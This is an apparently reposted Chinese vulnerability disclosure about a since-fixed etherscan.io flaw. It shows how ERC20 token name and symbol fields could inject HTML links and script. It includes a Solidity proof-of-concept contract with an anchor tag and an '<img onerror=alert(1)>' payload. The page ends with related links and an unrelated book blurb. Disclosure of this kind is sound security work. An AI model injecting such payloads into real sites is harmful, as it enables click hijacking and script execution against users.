内容简介:https://etherscan.io部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。在用户访问点击页面内的合约名字,可以劫持至任意网站。
漏洞URL:如果是Web就填写此项
https://etherscan.io
简要描述:漏洞说明、利用条件、危害等
部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。
在用户访问点击页面内的合约名字,可以劫持至任意网站。
需要部署ERC20标准的合约,且在访问合约页面之前,发起一次交易。
漏洞证明:
https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns
漏洞利用代码:
pragma solidity ^0.4.24;
contract MyTest {
mapping(address => uint256) balances;
uint256 public totalSupply;
mapping (address => mapping (address => uint256)) allowance;
address public owner;
string public name;
string public symbol;
uint8 public decimals = 18;
event Transfer(address indexed _from, address indexed _to, uint256 _value);
function MyTest() {
name = "<a href=http://baidu.com>12321</a>";
symbol = 'ok<img src=/ onerror=alert(1)> ';
totalSupply = 100000000000000000000000000000000000;
}
function mylog(address arg0, address arg1, uint256 arg2) public {
Transfer(arg0, arg1, arg2);
}
}
修复方案:
过滤
————————————————————————————————
经与Etherscan厂商联系,目前已修复该漏洞
以上所述就是小编给大家介绍的《etherscan点击劫持漏洞》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- 组合漏洞导致的账号劫持
- [浏览器安全漏洞一] dll劫持漏洞
- 前端中存在的变量劫持漏洞
- 可导致数百万玩家帐户被劫持:EA游戏帐户劫持漏洞分析
- HackerOne | 子域名劫持漏洞的挖掘指南
- 曲速未来 消息:etherscan点击劫持漏洞分析
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
人工智能的未来
Jeff Hawkins、Sandra Blakeslee / 贺俊杰、李若子、杨倩 / 陕西科学技术出版社 / 2006.1 / 18.5
陕西科技出版社最新引进美国图书《人工智能的未来》(On Intelligence)一书,是由杰夫•霍金斯,一位在硅谷极其成功、受人尊敬的计算机工程师、企业家与桑德拉•布拉克斯莉,《纽约日报》的栏目作家共同撰写。本书对人类大脑皮层所具有的知觉、认识、行为和智能功能新理论提出了新的理论构想。这一理论的独到之处在于对大脑皮层的现行认识提出了新的观点,对大脑的工作原理,即霍金斯称之为“真正智能”而非计算机......一起来看看 《人工智能的未来》 这本书的介绍吧!
